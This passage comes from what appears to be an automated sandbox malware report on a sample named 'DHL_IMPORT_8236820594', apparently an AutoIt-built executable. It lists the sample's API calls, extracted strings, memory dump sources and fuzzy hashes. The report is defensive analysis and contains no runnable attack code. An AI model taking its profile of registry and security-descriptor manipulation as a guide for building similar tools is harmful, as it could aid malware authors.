                                                                                          • CreateSolidBrush.GDI32(?), ref: 0086744B
                                                                                          • GetSysColor.USER32(00000011), ref: 00867463
                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00867471
                                                                                          • SelectObject.GDI32(?,00000000), ref: 00867482
                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0086748B
                                                                                          • SelectObject.GDI32(?,?), ref: 00867498
                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 008674B7
                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008674CE
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 008674DB
                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0086752A
                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00867554
                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00867572
                                                                                          • DrawFocusRect.USER32(?,?), ref: 0086757D
                                                                                          • GetSysColor.USER32(00000011), ref: 0086758E
                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00867596
                                                                                          • DrawTextW.USER32(?,008670F5,000000FF,?,00000000), ref: 008675A8
                                                                                          • SelectObject.GDI32(?,?), ref: 008675BF
                                                                                          • DeleteObject.GDI32(?), ref: 008675CA
                                                                                          • SelectObject.GDI32(?,?), ref: 008675D0
                                                                                          • DeleteObject.GDI32(?), ref: 008675D5
                                                                                          • SetTextColor.GDI32(?,?), ref: 008675DB
                                                                                          • SetBkColor.GDI32(?,?), ref: 008675E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                          • String ID:
                                                                                          • API String ID: 1996641542-0
                                                                                          • Opcode ID: 1cc4ae1fa7bc685d01fe48eb443e84533bde5c717895d75ab06b6ba6cac2e3e0
                                                                                          • Instruction ID: 588a844755e157a4a807ef1de61b3f1084057148cada31f78b06a3410d24cd0c
                                                                                          • Opcode Fuzzy Hash: 1cc4ae1fa7bc685d01fe48eb443e84533bde5c717895d75ab06b6ba6cac2e3e0
                                                                                          • Instruction Fuzzy Hash: 69616D72900218AFDF019FA4DC49EAE7FB9FF09320F125125F915AB2A1D7B49940CF90
                                                                                          Function 00860FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(?), ref: 00861128
                                                                                          • GetDesktopWindow.USER32 ref: 0086113D
                                                                                          • GetWindowRect.USER32(00000000), ref: 00861144
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00861199
                                                                                          • DestroyWindow.USER32(?), ref: 008611B9
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008611ED
                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0086120B
                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0086121D
                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00861232
                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00861245
                                                                                          • IsWindowVisible.USER32(00000000), ref: 008612A1
                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 008612BC
                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 008612D0
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 008612E8
                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 0086130E
                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00861328
                                                                                          • CopyRect.USER32(?,?), ref: 0086133F
                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 008613AA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                          • String ID: ($0$tooltips_class32
                                                                                          • API String ID: 698492251-4156429822
                                                                                          • Opcode ID: ec530ec54d4356abe326d81ffa0437541ff2cb522ca672665d553ae975316a28
                                                                                          • Instruction ID: 438e3b7692495e6ad3d20a5238795bcfd3d8c43812a2a0ba24553beaafb08e4f
                                                                                          • Opcode Fuzzy Hash: ec530ec54d4356abe326d81ffa0437541ff2cb522ca672665d553ae975316a28
                                                                                          • Instruction Fuzzy Hash: DFB18A71604341AFDB00DF64C988B6ABBE4FF88344F05891DF99ADB262C771E844CB92
                                                                                          Function 007E8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007E8968
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 007E8970
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007E899B
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 007E89A3
                                                                                          • GetSystemMetrics.USER32(00000004), ref: 007E89C8
                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007E89E5
                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007E89F5
                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007E8A28
                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007E8A3C
                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 007E8A5A
                                                                                          • GetStockObject.GDI32(00000011), ref: 007E8A76
                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 007E8A81
                                                                                            • Part of subcall function 007E912D: GetCursorPos.USER32(?), ref: 007E9141
                                                                                            • Part of subcall function 007E912D: ScreenToClient.USER32(00000000,?), ref: 007E915E
                                                                                            • Part of subcall function 007E912D: GetAsyncKeyState.USER32(00000001), ref: 007E9183
                                                                                            • Part of subcall function 007E912D: GetAsyncKeyState.USER32(00000002), ref: 007E919D
                                                                                          • SetTimer.USER32(00000000,00000000,00000028,007E90FC), ref: 007E8AA8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                          • String ID: AutoIt v3 GUI
                                                                                          • API String ID: 1458621304-248962490
                                                                                          • Opcode ID: 9e75cd6a90726bad68e7472a5b13d891b52e40393fdc560c49ffaf3388767878
                                                                                          • Instruction ID: 6df72e99b78c4fcf9bc208b9dcd2fcc11dbf7fefa233aa3a00405dbf3040b2d3
                                                                                          • Opcode Fuzzy Hash: 9e75cd6a90726bad68e7472a5b13d891b52e40393fdc560c49ffaf3388767878
                                                                                          • Instruction Fuzzy Hash: EDB18A75A0024ADFDF14DFA8DC49BAE7BB4FB48314F118229FA15E7290DB78A850CB51
                                                                                          Function 00830D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
                                                                                            • Part of subcall function 008310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
                                                                                            • Part of subcall function 008310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
                                                                                            • Part of subcall function 008310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
                                                                                            • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D
                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00830DF5
                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00830E29
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00830E40
                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00830E7A
                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00830E96
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00830EAD
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00830EB5
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00830EBC
                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00830EDD
                                                                                          • CopySid.ADVAPI32(00000000), ref: 00830EE4
                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00830F13
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00830F35
                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00830F47
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F6E
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830F75
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F7E
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830F85
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830F8E
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830F95
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00830FA1
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830FA8
                                                                                            • Part of subcall function 00831193: GetProcessHeap.KERNEL32(00000008,00830BB1,?,00000000,?,00830BB1,?), ref: 008311A1
                                                                                            • Part of subcall function 00831193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00830BB1,?), ref: 008311A8
                                                                                            • Part of subcall function 00831193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00830BB1,?), ref: 008311B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                          • String ID:
                                                                                          • API String ID: 4175595110-0
                                                                                          • Opcode ID: 45bfac92e8d2915ed59ab8ca4e911868e3ae0c3875ebd54a7c72464756ff2daa
                                                                                          • Instruction ID: 0e07e549932769c2509471493747a8e80269551eee3b76a76875450fabcead26
                                                                                          • Opcode Fuzzy Hash: 45bfac92e8d2915ed59ab8ca4e911868e3ae0c3875ebd54a7c72464756ff2daa
                                                                                          • Instruction Fuzzy Hash: 5C715B7290420AEBDF209FA4DC48FAEBBB8FF45700F054115FA99E6191DB719905CFA0
                                                                                          Function 0085C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085C4BD
                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0086CC08,00000000,?,00000000,?,?), ref: 0085C544
                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0085C5A4
                                                                                          • _wcslen.LIBCMT ref: 0085C5F4
                                                                                          • _wcslen.LIBCMT ref: 0085C66F
                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0085C6B2
                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0085C7C1
                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0085C84D
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0085C881
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0085C88E
                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0085C960
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                          • API String ID: 9721498-966354055
                                                                                          • Opcode ID: f4f8173c6e87d41c4252ceef107940ad9575360ee3d13635b0f045914ef57084
                                                                                          • Instruction ID: 9b1bb5b6851c130945dbcde97a158905d0ccbc86c0395fef9d06bfdc838419fa
                                                                                          • Opcode Fuzzy Hash: f4f8173c6e87d41c4252ceef107940ad9575360ee3d13635b0f045914ef57084
                                                                                          • Instruction Fuzzy Hash: D9124535604201DFCB14DF14C885A2AB7E5FF88715F08889DF88A9B3A2DB35ED45CB92
                                                                                          Function 0086091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CharUpperBuffW.USER32(?,?), ref: 008609C6
                                                                                          • _wcslen.LIBCMT ref: 00860A01
                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00860A54
                                                                                          • _wcslen.LIBCMT ref: 00860A8A
                                                                                          • _wcslen.LIBCMT ref: 00860B06
                                                                                          • _wcslen.LIBCMT ref: 00860B81
                                                                                            • Part of subcall function 007EF9F2: _wcslen.LIBCMT ref: 007EF9FD
                                                                                            • Part of subcall function 00832BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00832BFA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                          • API String ID: 1103490817-4258414348
                                                                                          • Opcode ID: eb81fd6babac40b287e96e1b06bcf391e9517c635e648575f9862feb062ed311
                                                                                          • Instruction ID: 2a50f21a4a0dbd202ffde777a878fb39d70d79c01d732e731aaba6a9d565f497
                                                                                          • Opcode Fuzzy Hash: eb81fd6babac40b287e96e1b06bcf391e9517c635e648575f9862feb062ed311
                                                                                          • Instruction Fuzzy Hash: 22E17A31208301DFCB14EF68C45092AB7E2FF98358B168A5DF8969B362D735ED45CB86
                                                                                          Function 0085C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                          • API String ID: 1256254125-909552448
                                                                                          • Opcode ID: 6a5acea7056316aa4cbb525f7115632bd4b0ec3594b496089b0a8cfb2725905b
                                                                                          • Instruction ID: a4d4675c57d038ece6de169e8692a0d1af8a03d6da9883c3d0b7b4123adc3a54
                                                                                          • Opcode Fuzzy Hash: 6a5acea7056316aa4cbb525f7115632bd4b0ec3594b496089b0a8cfb2725905b
                                                                                          • Instruction Fuzzy Hash: 5671047260022A8FCF20DE68CD415BF37A1FBA0766B150128FC66E7284E634DD4CCBA1
                                                                                          Function 0086833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0086835A
                                                                                          • _wcslen.LIBCMT ref: 0086836E
                                                                                          • _wcslen.LIBCMT ref: 00868391
                                                                                          • _wcslen.LIBCMT ref: 008683B4
                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008683F2
                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0086361A,?), ref: 0086844E
                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00868487
                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 008684CA
                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00868501
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0086850D
                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0086851D
                                                                                          • DestroyIcon.USER32(?), ref: 0086852C
                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00868549
                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00868555
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                          • String ID: .dll$.exe$.icl
                                                                                          • API String ID: 799131459-1154884017
                                                                                          • Opcode ID: e0c055d074c66995dad940fb43eead7b1a611c54759728f7919680416d2bbe10
                                                                                          • Instruction ID: 86043e3be8e7e87a4af397cc2e6c70f078170b8ad60330f42571df23038ce5e5
                                                                                          • Opcode Fuzzy Hash: e0c055d074c66995dad940fb43eead7b1a611c54759728f7919680416d2bbe10
                                                                                          • Instruction Fuzzy Hash: FA61BF71540219FAEB14DF64CC49BBF77A8FB04B11F11460AF91AE62D1DFB4AA50CBA0
                                                                                          Function 007D7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                          • API String ID: 0-1645009161
                                                                                          • Opcode ID: eb69e75d8080f7a425655faae4f7110112d4629d47974883213f8e432572cd69
                                                                                          • Instruction ID: 5e1f97a3854ad6b66953b6b736bfb6189910fba871101a4207fa6aa63b700350
                                                                                          • Opcode Fuzzy Hash: eb69e75d8080f7a425655faae4f7110112d4629d47974883213f8e432572cd69
                                                                                          • Instruction Fuzzy Hash: 5181DF71604605FADB25AF60DC46FAA37B8FF54300F044426FA19AA392FB78DA51C6A1
                                                                                          Function 00835A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadIconW.USER32(00000063), ref: 00835A2E
                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00835A40
                                                                                          • SetWindowTextW.USER32(?,?), ref: 00835A57
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00835A6C
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00835A72
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00835A82
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00835A88
                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00835AA9
                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00835AC3
                                                                                          • GetWindowRect.USER32(?,?), ref: 00835ACC
                                                                                          • _wcslen.LIBCMT ref: 00835B33
                                                                                          • SetWindowTextW.USER32(?,?), ref: 00835B6F
                                                                                          • GetDesktopWindow.USER32 ref: 00835B75
                                                                                          • GetWindowRect.USER32(00000000), ref: 00835B7C
                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00835BD3
                                                                                          • GetClientRect.USER32(?,?), ref: 00835BE0
                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00835C05
                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00835C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 895679908-0
                                                                                          • Opcode ID: 7624c16edd979d52aa82f215657f50de3983f6b032c588052599d0009c079d9e
                                                                                          • Instruction ID: 2d58bcd1a8e176633596ccdde4f8abc4bd98d323ebda294beb1151081116e5b0
                                                                                          • Opcode Fuzzy Hash: 7624c16edd979d52aa82f215657f50de3983f6b032c588052599d0009c079d9e
                                                                                          • Instruction Fuzzy Hash: 49715E31900B09AFDB20DFA8CE85A6EBBF5FF88715F104918E582E25A0D775E944CB50
                                                                                          Function 007F00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007F00C6
                                                                                            • Part of subcall function 007F00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(008A070C,00000FA0,A99004F5,?,?,?,?,008123B3,000000FF), ref: 007F011C
                                                                                            • Part of subcall function 007F00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008123B3,000000FF), ref: 007F0127
                                                                                            • Part of subcall function 007F00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008123B3,000000FF), ref: 007F0138
                                                                                            • Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007F014E
                                                                                            • Part of subcall function 007F00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007F015C
